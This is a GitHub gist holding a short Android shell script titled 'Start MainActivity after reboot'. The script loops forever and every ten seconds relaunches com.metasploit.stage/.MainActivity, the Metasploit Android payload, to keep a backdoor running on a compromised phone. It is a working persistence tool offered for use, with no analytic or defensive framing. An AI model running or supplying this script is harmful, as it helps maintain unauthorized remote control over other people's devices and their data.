Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save RomaniukVadim/a7dfd673e080f2f1dbdd32e303527ade to your computer and use it in GitHub Desktop.
Save RomaniukVadim/a7dfd673e080f2f1dbdd32e303527ade to your computer and use it in GitHub Desktop.
Start MainActivity after reboot
#!/bin/sh
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 10
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment